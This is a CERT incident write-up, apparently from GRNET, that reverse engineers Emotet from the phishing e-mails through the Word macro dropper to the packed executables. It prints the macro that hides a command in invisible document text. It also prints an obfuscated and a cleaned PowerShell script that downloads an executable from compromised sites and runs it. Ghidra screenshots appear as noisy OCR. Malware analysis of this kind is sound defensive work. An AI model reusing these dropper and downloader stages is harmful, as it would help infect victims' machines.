1/56

By Dimitris Kolotouros and Marios Levogiannis

Reverse engineering Emotet – Our approach to protect
GRNET against the trojan

cert.grnet.gr/en/blog/reverse-engineering-emotet/

Preamble

In October 2020 we observed an outbreak of malicious e-mails reaching GRNET employees’
inboxes. Meanwhile, similar campaigns were also targeting several public and private sector
organizations in Greece. After acquiring dozens of such e-mails, we started planning our
defensive strategy. To do so, we started analyzing the malware that was attached to the
emails and realized that were dealing with the infamous Emotet trojan.

In this document, we describe the steps of our analysis including the reverse engineering
process of the malware executables, how we overcame the binary obfuscation techniques it
employed, and how we determined the malware’s internals. In the course of our work, we
were able to discover the list of IP addresses that constituted the network of Command-and-
Control (C2) servers of Emotet. This information was very useful because we utilized it to
detect any network connections from the GRNET network to the Emotet C2 network. Such
connections  would indicate a potential compromised workstation in our premises. Overall,
the goals of our analysis were to (a) create an infrastructure that received new updates of the
Emotet trojan and keep our list of C2 IP addresses up-to-date and (b) understand the trojan’s
persistence mechanism to perform forensic invastigations on compromised workstations.

https://cert.grnet.gr/en/blog/reverse-engineering-emotet/


2/56

On January 27, 2021 Europol announced that it had completely taken down Emotet. The
same day our update-monitoring infrastructure received an update which was Europol’s
clean-up payload scheduled to be executed on April 25, 2021 at 12:00 p.m.. Hopefully, this
will be the last time that we hear about Emotet. Meanwhile, we had been working on
analyzing Emotet up to the time of Europol’s announcement. We release our analysis results
hoping that IT professionals will find them useful when trying to protect against similar trojans
in the future.

In Chapter 1 we describe the malicious e-mails and the malware dropper (a macro-enabled
MS Word document) delivered via those e-mails. If you are already familiar with Emotet’s
dropper you may directly skip to the next chapters. In Chapter 2 we analyze the malware’s
multi-layer Protector responsible for unpacking, decrypting and running the trojan for the first
time. In Chapter 3 we describe the binary obfuscation techniques incorporated in the trojan
itself as well as the ways to bypass them. In Chapter 4 we provide an in-depth description of
the trojan’s inner-workings, its persistence mechanism, the communication with the
Command-and-Control servers network and the way we discovered the C2 network. Finally,
in Chapter 5 we briefly describe the process we followed to retrieve and analyze new
payloads served by the C2 network.

We have published the de-compiled code of referenced functions as well as the utilities that
we implemented during the analysis in a GitHub repository.

This work was carried out under the supervision of GRNET’s Chief Information Security
Officer, Dimitris Mitropoulos.

Dimitris Kolotouros – Head of IT Security Department, GRNET
Marios Levogiannis – Senior IT Security Engineer, GRNET

Figure 0. Emotet stages overview

Chapter 1. From the e-mails to the binaries

Introduction

https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action
https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_1_From_the_e-mails_to_the_binaries
https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_2_From_the_Protector_to_the_Trojan
https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_3_Overcoming_the_malware_obfuscation_techniques
https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_4_The_trojans_internals
https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_5_Monitoring_the_updates
https://github.com/grnet/emotet-utils
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-overview-1.png


3/56

October 2020.

Seven months have passed since the first COVID-19 lockdown in Greece. The pandemic
finds GRNET with a largely broadened IT Security agenda heavily linked with the state’s
current digital transformation (involving several new applications being developed and
maintained in house). The aforementioned developments, together with the work-from-home
style that has just arrived, completely redefined the security perimeter and priorities of
GRNET CERT. A new era comes with new challenges.

Somewhere in between the various ongoing tasks, a number of weird looking e-mails that
reached GRNET employees came to our notice. They all had a similar form, i.e., replies to
legitimate mails that either contain a URL or an encrypted ZIP attachment and its password.

The e-mails

First, to raise awareness, we notified all GRNET employees. Then, we started collecting and
analyzing the suspicious e-mails. Initially, we inspected their source code looking for
similarities.


4/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-email-1.png
FO a The original sender display name

Sent: Monday, October 26, 2020 3:46 PM
To:Eingmet.gr with a different email address
Subject: Re: EE OO

a

~ The original email subject

https://email.com/Documentation/enpkx2020)-6045 7063 76-626 1044908-gi8uto-knfcakby6

The original sender display
< name and email address

The quoted original email body

4

The actual link target is
——S

j (2) https://memouetry.com/wp-admin/Im/k5v9RbOVgUg/

4/56


5/56

Figure 1. E-mails delivering Emotet dropper via URL (left) and attachment (right)
Our analysis led to several interesting remarks:

All e-mails were replies to legitimate e-mails. The e-mail subject followed a specific
pattern, i.e., “Re: <ORIGINAL MAIL SUBJECT>”. Also, the e-mail body contained the
quoted original e-mail body.
The sender’s display name was altered to be the same with that of the original e-mail.
However, the sender’s e-mail address was some unrelated e-mail address (several
compromised e-mail accounts were used).

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-email-2.png


6/56

The body of the reply contained either a URL or an attachment.
In the case of the URL, the text contained a legitimate domain name (e.g.
gmail.com). Nevertheless, the actual target was completely different. Our
investigation indicated that they were compromised websites used by the
attackers to host the malicious documents.
In the case of the attachment we observed encrypted ZIP files with the
corresponding password contained in the reply body. Note that password
encrypted attachments are commonly used to bypass any malware detection
running on e-mail servers.

Finally, in all cases we ended up with MS Word documents.

The MS Word documents

Up to this point, we had already been informed about similar cases affecting other public and
private sector organizations in Greece. Thus, a conventional incident response was not
enough; we wanted to further analyze the malware.

Our analysis started with the Word documents. When opening one of the documents, the
victim sees a fake pop-up window. In fact, this is just an image inside the document imitating
a legitimate pop-up window. In each document the fake pop-up window phrasing was
different, but in every case it was there to persuade the victim to enable the Macro execution.


7/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-word-doc-1.png
Eile Edit View |nsert Format Styles

S-S-h-\bS

fileldoc - LibreOffice Wri

Table Fogm Jools Window Help x

Nfl orC AY TI Bro ha ABO e@bG

Ei-
Default Paragraph sh] hs A |catibri
&

L Tatar an

Page 1 of 1 4,795 words, 21,422

Dh A BIUS X%/ Fi A-v-\=

3 4 :—
4 4 4 ra 4 a 4 4 4

Microsoft Office Wizard Gl
Microsoft Office

1} Office ©
Transformation Wizard
Operation did not complete successfully because the file was created on Android device.
To view and edit document click “Enable Editing” and then click “Enable Content”.

sill

characters Default Page Style {en-US} oT} & OOo | =-———— + | 100%

7/56


8/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-word-doc-2.png
Eile Edit View Jnsert Format Styles Table Fopm Jools Window Help

S-S-h-\bS Nfl orC |A* TI B-oibe aBbrOv@bGrPS

Default Paragraph St] AA |catibri ha ju pt fa | BI US|IxX?%!|4\A-¥-\|=
1 2

m nm a

ia | My Office

You are attempting to open a file that was created in an earlier version of Microsoft Office.
If the file opens in Protected View, click Enable Edition and then click Enable Content.

Page 1 of 1 Default Page Style {en-US} Oy |)

| 7,015 words, 27,950 characters

@ fH © LD li]

zl
000.60 | ————+——. + | 100%

8/56


9/56

Figure2. Fake MS Word pop-ups in Emotet dropper
We will continue by analyzing one of the MS Word documents. All other documents were
similar to the one examined; albeit with minor differences.

The VBScript Macros

To see what would happen when a user enabled the macros, we examined the
corresponding VBScript. The entry-point Document.Open()  called function
Q4hxwcihtett()  of module Iauesnh6lzhaf :

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-word-doc-3.png


10/56

Figure 3. The VBScript macro entry-

point
The function code, as we observe below, was obfuscated:

Figure 4. The main VBSript macro module
We started following the code flow manually to understand it. This manual process revealed
that most of the code was indeed irrelevant. Specifically, for each meaningful code
instruction, the obfuscation process had generated a bunch of meaningless instructions
placed before the meaningful one. So, most of the de-obfuscation effort was to identify each
block and isolate the meaningful code instruction out of the block.

Luckily enough, the attackers had left some traces that were helpful for us. As we noticed,
their obfuscating tool had a serious issue (nobody’s perfect). In particular, it did not apply the
indentation of the original instruction on the instructions of the replacement block. As a result,
the original indentation could be found on the first instruction of each block. This issue gave
us a way to automatically detect the blocks and isolate the last instruction of each block,
which we knew it was the meaningful instruction of the block.

The following obfuscation techniques were identified:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-vbscript-1.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-vbscript-2-edited.png


11/56

Deliberate run-time errors in junk instructions (which were ignored because of the On
Error Resume Next  statement),
String construction using one or more of the following:

String concatenation,
Use of undefined variables that resolve to empty strings,
String replacements with the Replace()  function,
Conversion of ASCII codes to strings with the ChrW()  function,
Retrieval of values from hidden user form control elements,

Alteration between upper and lower case letters in symbol names, exploiting the case
insensitivity of Windows OS,
Use of the line-continuation character _  to break statements in multiple lines.

Then, we only had to manually de-obfuscate some lines of code (the original number of lines
was a little more than 400). The result was the following:

01: Rem Attribute VBA_ModuleType=VBADocumentModule 
02: Option VBASupport 1 
03: Private Sub Document_open() 
04:   Set storyRange = ThisDocument.StoryRanges.Item(1) 
05:   Set commandLine = Mid(storyRange, 5, Len(storyRange)) 
06:   commandLine = Replace(commandLine, "][ 1) jjkgS [] []w", Empty) 
07:   Set objProcess = CreateObject("winmgmts:Win32_Process") 
08:   Set objProcessStartup = CreateObject("winmgmts:Win32_ProcessStartup") 
09:   objProcessStartup.ShowWindow = 0 
10:   objProcess.Create commandLine, Empty, objProcessStartup 
11: End Sub

Hence, we were able to answer an important question: “What happens when the user
executes this macro?”

Well, it spawns a process calling the Win32_Process.Create()  method (line 10). The
startup information parameter says “do not show a window” (line 9). Further, the command
line parameter holds the command that will be invoked by the spawned process. As we can
observe in the code, the command is already in the document (lines 4-5) together with some
junk that is removed (line 6).

So there was something more in the document itself apart from the fake popup window.

The PowerShell script

First, we removed the formatting. In this way we revealed a paragraph that was kept out of
the victim’s sight (it was formatted with a font size of 2px and a white font color):


12/56

Figure 5. Obfuscated PowerShell command hidden in document body
This looked obfuscated, too. But we already know how to de-obfuscate it, i.e.
Replace(commandLine, "][ 1) jjkgS [] []w", Empty) :

Figure 6. De-obfuscated PowerShell command
The result would attempt to run a PowerShell script that is encoded in base64 format. We
decoded it to discover the actual PowerShell script:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-powershell-1-edited.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-powershell-2.png


13/56

Figure 7. Base64-decoded PowerShell script
After performing a proper indentation, i.e. split lines on each ‘ ; ‘ and perform indentations
on code blocks ‘ { ‘ and ‘ } ‘, we got the following:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-dropper-powershell-3.png


14/56

$1D2  =[tYpE]("{3}{1}{4}{5}{0}{2}"-f 'ecTo','SteM.','Ry','sy','Io.','diR'); 
$tJ8m4B =[TYpe]("{2}{4}{5}{1}{3}{0}"-f 
'r','iNTmAnAg','sYsteM.nE','e','T','.SerVIcEpO') ; 
$Ysa212g=('N'+('b7ib0'+'0')); 
$S95cz34=$I0phsdk + [char](64) + $Ixdbxto; 
$Qdfg2cp=(('Chns'+'7')+'2'+'d'); 
(dIR variABle:1D2).valuE::"CR`eAteDir`ectory"($HOME + ((('8U'+'L')+('Pj'+'q')+
('6t3'+'_8UL'+'Jvn'+'k')+('7'+'yk')+('8U'+'L'))."R`e`place"(('8'+'UL'),'\'))); 
$Qo08jci=('F'+'5'+('ocx'+'ex')); 
(  ITEM  vARIAblE:Tj8M4B ).VAlUe::"SeC`U`RI`TyPRoTOc`OL" = (('Tl'+'s1')+'2'); 
$R7w053i=(('Nue'+'l2')+'4'+'k'); 
$Tedbr00 = ('N'+'1p'+('jur'+'3u')); 
$H_8yni0=('J6'+'a'+('f'+'fv6')); 
$Roz09dp=('V'+('t9'+'1oph')); 
$Glkvf7b=$HOME+(('{0'+'}Pjq6'+'t'+'3_'+'{0'+'}Jvnk7yk{0}') -F[Char]92)+$Tedbr00+
('.e'+'xe'); 
$Ads4mxg=(('E'+'2n')+'0j'+'qo'); 
$Q4b1g5n=.('new-o'+'b'+'jec'+'t') nEt.WEBcLieNt; 
$Boiep01=((('ht'+'tp:]['+' ')+'1'+((') '))+'jj'+(('kgS [] []w'+']['+' 1)'+' '))+
('jj'+'kgS []')+(' []wi'+'nnh')+('anma'+'chn.')+(('com]'+'[ 1) '))+'j'+('jkgS'+' 
[]')+(' []'+'w')+'wp'+('-'+'adm')+(('in][ '+'1)'+' j'))+('j'+'kg')+('S []'+' 
[]')+'w'+('sA'+']')+'['+((' 1'+') jjkg'+'S'))+' '+'['+('] '+'[')+']w'+'@h'+
(('ttp:'+']'+'[ '+'1) jj'))+('k'+'gS ')+('[]'+' ')+'['+']'+(('w]['+' 1)'))+(' 
j'+'j')+('kgS []'+' []'+'wsh')+'om'+'al'+('house'+'.co')+('m]'+'[')+' 1'+((')'+' 
jjkg'))+('S '+'[]')+(' []wwp-'+'in'+'c'+'lu')+'de'+('s'+'][')+' 1'+((') '))+
('j'+'jk')+'g'+'S '+('[]'+' [')+(']w'+'I')+('D3'+'][')+' 1'+')'+(' jjk'+'g')+('S 
'+'[]')+' '+(('['+']wI'+'Dz][ 1)'))+(' jjkg'+'S')+' '+('[] '+'['+']w@h')+
('ttp'+':]'+'[ ')+(('1)'))+(' '+'jjkgS '+'[] ')+('[]'+'w][')+((' '+'1)'))+(' 
'+'jjk')+('g'+'S []')+(' ['+']')+'wb'+'lo'+('g'+'.ma')+('r'+'tyr')+('ol'+'ni')+
('ck.'+'com')+']'+('['+' 1')+((')'+' j'))+'jk'+('gS'+' [] '+'[')+(']wwp'+'-'+'adm')+
('in'+']')+(('[ 1) '+'jj'))+'k'+('gS ['+'] ')+('['+']wS')+('pq]'+'[ 1')+((') 
'))+'j'+'jk'+('gS [] []'+'w'+'@htt')+'p'+'s:'+']'+(('[ '+'1) j'+'jkgS '))+'[]'+' '+
('['+']w]')+'['+' 1'+((') '))+'jj'+('kgS [] ['+']wwww'+'.f')+'r'+
('ajamom'+'ad'+'ri'+'d.c'+'om')+(']'+'[ 1')+((') j'+'j'))+'kg'+'S '+('[] ['+']w')+
('wp'+'-')+('cont'+'e')+('nt'+']')+'[ '+'1'+((')'+' j'))+('jk'+'g')+'S'+(' ['+']')+(' 
'+'[]wg]')+(('[ 1)'+' j'+'jkg'))+'S '+('[]'+' ')+('['+']w@h')+'tt'+(('p'+'s:'+'][ 
1'+') '+'jjk'+'gS [] '))+('[]w]['+' ')+(('1)'+' '))+('jjkg'+'S ['+']')+' ['+']w'+
('p'+'esqui')+('s'+'ac')+'re'+'d'+(('.'+'com][ 1) jj'+'k'))+'g'+'S '+'[]'+(' 
[]w'+'vmw')+('ar'+'e-unl')+('ock'+'e')+('r'+'][ 1')+((') '))+('j'+'jk')+'g'+('S ['+'] 
')+('['+']w')+'da'+'C'+']'+'['+((' '+'1) '+'jj'))+('kg'+'S')+' '+('[]'+' 
')+'[]'+'w'+'@'+('ht'+'tp')+'s:'+']['+((' 1)'+' '))+'j'+'j'+('k'+'gS')+(' ['+']')+(' 
['+']')+('w][ '+'1')+')'+' '+('jj'+'kgS ')+'['+(']'+' []wme')+'d'+('h'+'em')+
(('pfa'+'rm.c'+'om]'+'[ 1)'))+' '+('jj'+'kg')+('S'+' [] [')+(']wwp'+'-a')+'dm'+
('in'+']')+'['+' '+'1'+((') jjkgS ['+']'+' []w'+'L'))+'b'+(('][ 1'+') jj'))+
('k'+'gS'+' []')+' '+'[]'+'w'+'@h'+('t'+'tp:][ 1')+')'+(' j'+'jkgS []'+' ')+'['+
(']w]'+'[')+((' 1'+')'))+(' '+'jj')+('kg'+'S []'+' []')+'w'+('ien'+'g')+
('li'+'sha')+'bc'+('.c'+'o')+(('m]['+' 1)'+' j'))+('jk'+'gS')+((' '+'[]'+' 
['+']wc'+'ow][ 1'+') '))+'jj'+'k'+('gS'+' ')+'['+']'+(' '+'[]')+('w2B'+'B')+(('][ 
'+'1)'))+' '+'j'+('jk'+'g')+('S '+'[] ')+'[]'+'w'))."R`ep`lacE"(((']['+((' '+'1) 
jjkg'+'S []'))+' '+('[]'+'w'))),([array]('/'),('x'+'we'))[0])."S`PliT"($Od7ccw9 + 
$S95cz34 + $On55ljg); 
$Q9eccc5=(('F'+'o4')+'g'+('2'+'rk')); 
foreach ($S7m_bsh in $Boiep01){ 
   try{ 
       $Q4b1g5n."d`oWnL`Oa`DfIlE"($S7m_bsh, $Glkvf7b); 


15/56

       $E4fktea=('D'+'li'+('0'+'4n_')); 
       If ((&('Get'+'-Ite'+'m') $Glkvf7b)."l`e`Ngth" -ge 47912) { 
           ([wmiclass]('wi'+('n'+'32')+'_P'+('r'+'ocess')))."CR`e`AtE"($Glkvf7b); 
           $Klmmlcr=(('V6z'+'43'+'q')+'d'); 
           break; 
           $Myse8pt=('S8'+('266j'+'7')) 
       } 
   } catch{ 
 
   } 
} 
$Xwnf9b5=('R_'+('1kl'+'w')+'o')

We then noticed some common obfuscation techniques:

String formatting to scramble string elements (e.g. {3}{1}{4}{5}{0}{2}"-f
'ecTo','SteM.','Ry','sy','Io.','diR' ),
Insertions of the word-wrap operator ( ` ) in symbol names (e.g. d`oWnL`Oa`DfIlE ),
Alteration between upper and lower case letters in symbol names exploiting the case
insensitivity of Windows OS (e.g. nEt.WEBcLieNt ),
String construction with concatenation and junk removal with the Replace()  method,
Use of undefined variables in string concatenations that actually act as empty strings,
and
Insertion of irrelevant code instructions.

We then used a PowerShell interpreter to evaluate strings and after removing irrelevant
instructions and renaming the variables, we had the de-obfuscated code:

System.IO.Directory::CreateDirectory($HOME + "\\Pjq6t3_\\Jvnk7yk\\"); 
System.Net.ServicePointManager::SecurityProtocol = "Tls12"; 
$filepath = $HOME + "\\Pjq6t3_\\Jvnk7yk\\N1pjur3u.exe"; 
$webclient = New-Object System.Net.WebClient; 
$urls = "http://in*******hn.com/wp-admin/sA/", 
   "http://sh*******se.com/wp-includes/ID3/IDz/", 
   "http://blog.ma********ck.com/wp-admin/Spq/", 
   "https://www.fr*********id.com/wp-content/g/", 
   "https://pe********ed.com/vmware-unlocker/daC/", 
   "https://me*******rm.com/wp-admin/Lb/", 
   "http://ie*******bc.com/cow/2BB/"; 
foreach ($url in $urls) { 
   try { 
       $webclient.DownloadFile($url, $filepath); 
       If ((Get-Item $filepath).Length -ge 47912) { 
           ([wmiclass]("Win32_Process")).Create($filepath); 
           break; 
       } 
   } catch {} 
}


16/56

The outcome was a script that was pretty simple. Actually, it attempts to download an
executable file from several URLs and store it in the following path:
$HOME\Pjq6t3_\Jvnk7yk\N1pjur3u.exe  (the URLs and the path were different in each

Word document). The size of each downloaded file is checked against a minimum value to
ensure that if the executable has been removed from the compromised website, the 404
HTML page will be ignored and the next URL will be tried. When a file has been downloaded,
it gets executed in a new process by calling the Win32_Process.Create()  method.

After following the same de-obfuscation procedure on every Word document available, we
fetched the actual malware executables from the URLs described in the PowerShell scripts.
To do so, we imitated the PowerShell User-Agent in a way; we needed to look like a
malicious PowerShell script after all!

PS. During the course of our analysis we came across several compromised e-mail accounts
and websites. In all cases, we sent abuse reports to the corresponding abuse contacts
informing them of their compromised assets.

Chapter 2. From the protector to the trojan

Introduction

In the previous chapter we documented the detection and preliminary analysis of a malware
that was distributed via e-mails. We saw that the e-mails included an MS Word document
with macros that spawn a new process running a PowerShell script in the victims machine.
We also observed that the PowerShell script spawns one more process running an
executable file downloaded from the Internet. Finally, we downloaded several of those
executable files.

With the executable files at hand, we wanted to examine their internals without running them.
Thus, we continued with our reverse engineering process. At this point we started working
with Ghidra, a free, open-source, reverse engineering tool that was released last year.

The executable files

First, we loaded some of the executable files and observed that they were PE (Portable
Executable) files compiled for the x86 LE architecture.


17/56

Figure

8. Emotet Protector’s architecture details
We started looking for meaningful data such as imported symbols and defined strings. To our
surprise we observed a number of different programs. Also, we noticed that in every
executable file there was one defined string looking like a random key.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-architecture-edited.png


18/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-strings-1.png
Location &,| String Value | String Re... | Data Type
0044b048 RegOpenkeyA "RegOpe... ds
0044b056 RegQueryValueA "RegQue... ds
0044b068 RegCreateKeyExA "RegCrea... ds
0044b07a RegSetValueExA "RegSetV... ds
0044b08a ADVAPI32.dll "ADVAPI... ds
0044b09a PathFindExtensionA "PathFin... ds
0044b0b0 PathFindFileNameA "PathFin... ds
0044b0c4 PathStripToRootA "PathStri... ds
0044b0d8 PathisUNCA "PathisU... ds
0044b0e4 SHLWAPIL.dll "SHLWAP... ds
0044b0f0 oledig.dll "oledig.dil" ds
0044b0fe CLSIDFromProgID "CLSIDFr... ds
0044b110 CLSIDFromString "CLSIDFr... ds
0044b122 CoTaskMemFree "CoTask... ds
0044b132 CoTaskMemAlloc "CoTask... ds
0044b144 CoGetClassObject "“CoGetCl... ds
0044b158 StgOpenStorageOnlLockBytes "stgOpe... ds
0044b176 $tgCreateDocfileOnlLockBytes "StgCrea... ds
0044b196 CreatelLockBytesOnHGlobal "CreatelL... ds
0044b1b2 OleUninitialize "OleUnin... ds
0044b1c4 CoFreeUnusedLibraries "CoFreeU... ds
0044blde Olelnitialize "Olelniti... ds
0044blec CoRevokeClassObject "CoRevo... ds
0044b202 OlelsCurrentClipboard "OlelsCu... ds
0044b21a OleFlushClipboard "OleFlus... ds
0044b22e CoRegisterMessageFilter "CoRegis... ds
0044b246 ole32.dll "ole32.dil" ds
0044b250 OLEAUT32.dll "OLEAUT... ds
0044c008 _X*MN@N&r_MIXHnkw4uajn2)D*cW(UR_(nSFfyV...] "_X*MNf... ds
0044c05c char[20]
0044c078 char[20]
0044c094 char[24]
0044c0b4 char[16]
OA A eee ehoel 1
Filter: fz] =

18/56


19/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-strings-2.png
Location &,| String Value String Re... | Data Type
00437188 atanh “atanh" ds
004371a8 ett. 2F “Gite. OF" ds
004371b0 Arial "Arial" ds
00437 1dc Error opening file "Error op... ds
004371f0 Warning... "Warning... ds
00437 lfc The following functions were not added becaus... "The foll... ds
00437258 * fit "* fit" ds
00437260 Function List (*.flt)|*.flt|All Files (*.*)|*.*|| "Functio... ds
00437298 functions "functio... ds

0043 72a4 MathDrawer could not save the graph to the sp... "MathDr... ds
004372e0 Error "Error" ds

0043 72e8 Bitmap Files "Bitmap... ds
0043728 Graph "Graph" ds
00437300 BMP (Windows Bitmap)|*.bmp| "BMP (Wi... ds
00437320 DC Not Found "DC Not... ds
0043733c | gqjflieéld&Sb<Nplwv8#!6j_hT8O7AUhWOuUe “gqjfls&l... ds
00437398 LdrAccessResource "LdrAcce... ds
004373ac LdrFindResource_U "LdrFind... ds
004373c0 ntdll.dll "ntdll.dll" ds

0043 73cc sResource "sResour... ds
004373d8 Acces "Acces" ds
00437364 urce_U “urce_lJ" ds

0043 73ec dReso "dReso" ds
00437384 LdrFin "LdrFin" ds

00437 3fc C:\Windows \Setup\State\ State.ini “C:\\Win... ds
00437420 Advapi32.dll "“Advapi3... ds
00437430 EncryptFileA “Encrypt... ds
00437440 MathDrawer is a simple function graphing appl... "MathDr... ds
004376b0 Tahoma "Tahoma" ds
004376bc Insufficient memory to create the sample points ‘“Insuffici... ds
00437710 char[16]
00437728 char[20]
00437748 char[12]
Ou A 2 Fe elsel il

19/56


20/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-strings-3.png
Defined Strings - 349 items
Location &.| String Value

ze x

G

| String Re... | Data Type

OO04137f4 VirtualQuery "VirtualQ... ds
00413804 InitializeCriticalSection "Initializ... ds
00413820 IsBadReadPtr "IsBadRe... ds
00413830 IsBadCodePtr "IsBadCo... ds
00413840 GetACP "GetACP" = ds
0041384a GetOEMCP "GerOEM... ds
00413856 GetCPinfa "GetCPin... ds
00413862 SetStdHandle "SetStdH... ds
00413872 GetUserDefaultLCID "“GetUser... ds
00413888 GetLocalelnfoA “GetLoca... ds
0041389a EnumSystemLocalesA "EnumsSy... ds
004138b0 IsValidLocale "IsValidL... ds
004138c0 IsValidCodePage "IsValidC... ds
004138d2 GetStringTypeA "GetStrin... ds
004138e4 MultiByteToWideChar "MultiByt... ds
004138fa GetStringTypeW "GetStrin... ds
0041390c LCMapStringA "LCMapS... ds
0041391c LCMapStringW "LCMaps... ds
0041392c HeapSize "HeapSize" ds
00413938 FlushFileBuffers "FlushFil... ds
0041394c VirtualProtect "VirtualP... ds
0041395e GetSystemIinfa "GetSyst... ds
0041396e CloseHandle "CloseHa... ds
0041397c GetLocalelnfoW "GetLoca... ds
0041398e Interlockedincrement "Interloc... ds
004139a6 InterlockedDecrement "Interloc... ds
004139be ReadFile "ReadFile" ds
00414068 JP’vvBSMJ/COQ?KH 1Gcpth?a&Wwadb$ui¥( "|PrvvB9... ds
00414c7c char[20]
00414c98 char[20]
00414cb4 char[16]
004 1l4cece char[24]
00414cec char[28]
OAL Ae ebarl Al


21/56

Figure 9. Random keys in various Emotet Protectors’ strings
Apart from that, all the other strings seemed to differ between the executable files. Assuming
that this is not a coincidence, we looked for references to these strings in the de-compiled
code. While looking, we noticed one more similarity: although the surrounding code also
seemed to differ between the executable files, there was an identical code pattern that
consumed the alleged key.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-strings-4.png


22/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-code-1.png
Lig
188
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
208
201
202
203
204
205
206
207
208
209
218
211
212
213
214
215
216
217
218
219
220
221

LPLLOPLLENAME = ApPppusSladCRh Lolo];
if (uStack108 < Ox10) {
LpLibFileName = apppuStack128;
t
apHStack536[8] = LoadLibraryAt (LPCSTR) lpLibFileName);
LpProcName = "ntdLL.d LL";
do {
pcVard = 1pProcName;
lpProcName = pcVard + 1;
} while (*pcVar4 != '\O');
phModule = apHStack536;
LpModuLleName = (LPCSTR)FUN_@0401050("ntdLL.d ll", (SIZE T)(pcVard + -Ox43d7fe));
BVar5 = GetModu leHand leExA(0, LpModuleName, phModu Le);
if (BVar5 '= 0) {
_DAT_O044eca@ = GetProcAddress(apHStack536[@] ,"LdrFindResource_U");
_DAT_O044ecac = GetProcAddress(apHStack536[@] ,"LdrAccessResource"):
t
iVar2 = (+_DAT_0044ecad) (0x400000,&1local_1e8,3,auStack496);
if (-1 < iVar?2) {
(+_DAT_O044ecac) (®x400000, uUStack512 ,&stackOxfftffdet,&uStack556);
}
_Dst = (code *)VirtualALLoc( (LPVOID) @x@,uStack556,0x1000, 0x40);
_memepy(_Dst,unaff_EBP,uStack556)+
FUN_@0401190(s5_ X+NfN&r_MIXHnkw4uaIn2)Decw(UR_ 0044c008,0xda,Gstack@xftftfdde);
FUN_@04021b0((int) Dst,uStack556,&stackOxfffffdde);
(* Dst)();
AfxEnabLeControlContainer((COccManager *)Q@x@);
FUN_@04027e80(aCStack476, (CWnd *)Ox0);
*#(CDialog x) (iStack492 + 0x20) = aCStack476;
uStacks. @ 1. = @xi?;
DoModal(aCStack476);
uStack8 = (undefined *)CONCAT31(uStack8._1 3 _,@x11);
~CDialog{aCStack476);
if (Oxf < uStacklo8) {
FUN_O0403e54(apppuStack124 [0] );
t
uStackl108 = @xT;
uStackll? = ®;
apppuStack128[0) = (undefinedd x) ((uint)apppuStacki28[8) & Oxfffttffoa);
if (Oxf < uStack192) {
FUN_O0403e54(pvStack212);
t
uStack192 = @xf:

22/56


23/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-code-2.png
152
153
154
155
156
157
158
159
168
161
162
163
164
165
166
167
168
169
178
171
172
173
174
175
176
li?
178
179
188
181
182
183
184
185
186
187
188
189
198
191
192
193

1nA

_s_ ntdll_LdrAccessResource_Addr = GetProcAddress(LoadedLibraryRef,s_LdrAccessResource
iVar2 = (*_s_ntdll_LdrFindResource_U_Addr)(@x400000,&ResourcelInfo,3, local_b4);
if (-1 < iVar2) {

(*_5_ntdLl_LdrAccessResource_Addr) (@x400000,ResourceDataEntry &stack@xttftttf24,astz2

}
puVard = (undefined4 *)VirtualALloc( (LPVOID) @x@,unaff_EBX,@x1000,0x40);
uVarS = unatf_EBX >> 2:
puVary = puVard;
while (uVar5 != 0) {
uVar5S = uVar5S = 1;
*puVvar? = *(undefined4 *)ResourceButfer;
ResourceBuffer = (char *)((undefined4 *)ResourceBuffer + 1);
puVary = puVar? + 1;
}
uVarS = unatf_EBx & 3;
while (uVar5 != 0) {
uVar5 = uVarS = 1;
*(char *)puVar7 = *ResourceBuffer;
ResourceBuffer = (char *)((int)ResourceBuffer + 1);
puVar? = (undefined4 *)((int)puVar7 + 1);
}
FUN_004064a0((int)s_gqjf!s&1ld&Sb<Nplvwv8e!6j_hT807AUh_0043733c,0x25,&stackOxffffffle);
FUN_00406540((int)puVar4,unaff_EBX,&stackOxftfftfftle);
(*(code *)puVard)();
puStack180 = (undefined4 *)FUN_O041a278(Ox3b0);
uStack24 = @xc;
if (puStacki00 = (undefined4 *)0x0) {
this = (int *)@x@;
}
else {
this = FUN_00404710(puStack100);
}
#(int x) (uStack200 + @xlc) = this;
uStack24 = @xb;
(a«(code s+) (*this + Oxb8))(0x80,0xcT8000,0,0);
FUN_O@41dbif(this,3);
uStack4@ = 8;
FUN_O@B4073e@(auStack96, '\xO1');
uStack40 = 7;
FUN_O04073e0(auStack132,'\xO1'):
uStack40 = 6;

EIR AMRAATIaAL aes) KA MAT Ve

23/56


24/56

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-code-3.png
167
168
169
178
171
1?2
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
198
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208

a0

Local_/@ = &local_fo;
}
_DAT_B0414fc@ = GetProcAddress(hModule, (LPCSTR) Local_7@);
iVar3 = (+_DAT_00414fc4) (0x400000,&Llocal_17c,3,local_180);
if (-1 < iVar3) {
(*_DAT_00414fcOQ) (0x400000, unaff_EBX,&stackOxfffffeic,&stackOxtfttfeb4);
}
